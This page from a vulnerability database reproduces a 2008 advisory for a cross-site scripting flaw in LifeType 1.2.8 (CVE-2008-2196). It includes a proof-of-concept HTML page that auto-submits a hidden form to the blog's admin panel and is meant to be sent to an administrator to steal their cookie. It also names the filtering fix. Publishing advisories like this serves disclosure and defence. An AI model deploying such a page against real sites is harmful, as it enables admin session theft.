Home
Bugtraq
Full List
Only Bugs
Only Tricks
Only Exploits
Only Dorks
Only CVE
Only CWE
Fake Notes
Ranking
CVEMAP
Full List
Show Vendors
Show Products
CWE Dictionary
Check CVE Id
Check CWE Id
Search
Bugtraq
CVEMAP
By author
CVE Id
CWE Id
By vendors
By products
RSS
Bugtraq
CVEMAP
CVE Products
Bugs
Exploits
Dorks
More
cIFrex
Facebook
Twitter
Donate
About
Submit
LifeType 1.2.8 XSS Vulnerability
2008.05.15
Credit:
Khashayar Fereidani Or Dr.Crash
Risk:
Low
Local:
No
Remote:
Yes
CVE:
CVE-2008-2196
CWE:
CWE-79
CVSS Base Score:
4.3/10
Impact Subscore:
2.9/10
Exploitability Subscore:
8.6/10
Exploit range:
Remote
Attack complexity:
Medium
Authentication:
No required
Confidentiality impact:
None
Integrity impact:
Partial
Availability impact:
None
---------------------------------------------------------------- Script : LifeType 1.2.8 Type : XSS Vulnerability ---------------------------------------------------------------- Discovered by : Khashayar Fereidani Or Dr.Crash Our Team : IRCRASH ---------------------------------------------------------------- Our Site : Http://IRCRASH.COM IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM ---------------------------------------------------------------- IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr ---------------------------------------------------------------- Script Download : http://mesh.dl.sourceforge.net/sourceforge/lifetype/lifetype-1.2.8.tar.b z2 ---------------------------------------------------------------- Type : Cross Site Scripting Method Of Send : POST File Name : http://Example/admin.php?op=editArticleCategories Vulnerable Variable : newBlogUserName Set "Add this user" Variable : "Add" Set "op" Variable : "addBlogUser" You Can Get Admin Cookie With This Vuln .... ---------------------------------------------------------------- Exploit : Upload This Page And Send Link For Administrator . ________________________________ <html> <head></head> #Vulnerabily discovered by Khashayar Fereidani Or Dr.Crash <body onLoad=javascript:document.form.submit()> <form action="http://Example/lifetype/admin.php?op=editArticleCategories" method="POST" name="form"> <input type="hidden" name="newBlogUserName" value="" [XSS CODE]"> <input type="hidden" name="Add this user" value="Add"> <input type="hidden" name="op" value="addBlogUser"> </form> </body> </html> ________________________________ ---------------------------------------------------------------- Solution : Edit Source Code And Filter newBlogUserName Variable With htmlspecialchar() function ....... ---------------------------------------------------------------- TNx : God...... Khashayar Fereidani Email : irancrash[at]gmail[dot]com IRCRASH TEAM - Http://IRCRASH.COM/ ----------------------------------------------------------------
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top